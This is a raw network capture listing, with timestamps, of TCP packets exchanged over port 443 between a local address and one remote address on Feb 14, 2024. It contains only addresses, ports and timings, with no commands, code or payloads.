Feb 14, 2024 09:08:18.312958956 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.312982082 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.313832045 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.313872099 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.313915968 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.313920975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.313935995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.313957930 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.314127922 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.314166069 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.314198017 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.314202070 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.314232111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.314251900 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.314882994 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.314922094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.314953089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.314958096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.314987898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.315009117 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.315207005 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.315246105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.315272093 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.315275908 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.315316916 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.316006899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.316044092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.316051006 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.316066980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.316075087 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.316112995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.316138029 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.316695929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.316734076 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.316766977 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.316771984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.316795111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.316818953 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.316951036 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.316988945 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.317022085 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.317027092 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.317058086 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.317078114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.317909002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.317949057 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.317982912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.317987919 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.318020105 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.318038940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.318041086 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.318061113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.318097115 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.318104029 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.318130970 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.318135977 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.318166971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.318197012 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.318948984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.318989038 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.319021940 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.319025993 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.319056988 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.319077969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.319282055 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.319322109 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.319346905 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.319350958 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.319392920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.320204973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.320242882 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.320280075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.320283890 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.320297956 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.320326090 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.320357084 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.320396900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.320421934 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.320425987 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.320461988 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.320482016 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.321154118 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.321191072 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.321222067 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.321225882 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.321259022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.321279049 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.322098017 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.322138071 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.322168112 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.322171926 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.322201014 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.322221041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.322254896 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.322292089 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.322321892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.322325945 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.322357893 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.322377920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.323030949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.323069096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.323098898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.323102951 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.323133945 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.323153973 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.323159933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.323179960 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.323224068 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.323225021 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.323246002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.323278904 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.323299885 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.324067116 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.324105978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.324139118 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.324142933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.324177027 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.324208021 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.324348927 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.324393034 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.324424982 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.324429035 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.324471951 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.324501991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.325092077 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.325129032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.325164080 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.325167894 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.325211048 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.325241089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.325297117 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.325335026 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.325367928 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.325371981 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.325417042 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.325445890 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.326230049 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.326267958 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.326307058 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.326309919 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.326355934 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.326383114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.326987028 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.327024937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.327056885 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.327060938 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.327094078 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.327115059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.327207088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.327245951 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.327274084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.327277899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.327310085 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.327332020 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.327955008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.327994108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.328020096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.328025103 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.328058004 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.328167915 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.328207970 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.328231096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.328234911 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.328255892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.328279018 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.329298019 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.329336882 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.329376936 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.329391956 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.329410076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.329432011 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.329448938 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.329488993 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.329508066 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.329513073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.329550982 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.330157995 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.330195904 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.330224037 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.330234051 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.330248117 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.330275059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.330401897 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.330442905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.330466986 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.330472946 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.330513000 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.330526114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.331239939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.331275940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.331305981 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.331316948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.331341028 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.331361055 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.331471920 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.331509113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.331530094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.331536055 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.331567049 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.331587076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.332314968 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.332355022 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.332395077 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.332410097 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.332422018 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.332441092 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.332454920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.332459927 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.332484961 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.332501888 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.332555056 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.332559109 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.332602978 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.333290100 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.333329916 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.333359957 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.333374023 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.333396912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.333419085 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.333477020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.333515882 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.333539009 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.333545923 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.333575010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.333595037 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.334379911 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.334419012 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.334445000 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.334456921 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.334481001 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.334501028 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.335371017 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.335410118 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.335438013 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.335447073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.335470915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.335490942 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.335506916 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.335546017 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.335563898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.335568905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.335597992 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.335618973 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.336231947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.336268902 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.336296082 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.336302996 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.336335897 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.336353064 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.336401939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.336441040 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.336463928 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.336468935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.336499929 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.336519957 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.337239981 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.337280035 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.337306976 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.337315083 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.337341070 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.337359905 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.337392092 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.337433100 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.337460041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.337465048 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.337495089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.337513924 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.338162899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.338201046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.338227987 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.338233948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.338260889 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.338282108 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.338500023 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.338540077 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.338570118 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.338576078 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.338603973 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.338625908 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.339312077 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.339353085 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.339378119 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.339385986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.339417934 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.339440107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.339473009 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.339512110 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.339530945 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.339534998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.339570045 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.340378046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.340415001 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.340445042 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.340450048 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.340468884 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.340485096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.340534925 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.340574026 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.340596914 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.340600967 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.340636969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.341267109 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.341304064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.341335058 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.341341972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.341357946 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.341381073 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.341540098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.341583014 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.341607094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.341612101 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.341641903 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.341661930 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.342200041 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.342238903 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.342266083 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.342272997 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.342302084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.342322111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.342364073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.342402935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.342426062 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.342430115 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.342459917 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.342480898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.342962980 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343003035 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343033075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.343038082 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343066931 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.343087912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.343266964 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343305111 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343337059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.343342066 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343367100 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.343388081 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.343888998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343925953 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.343955040 CET	49712	443	192.168.2.5	172.67.215.45
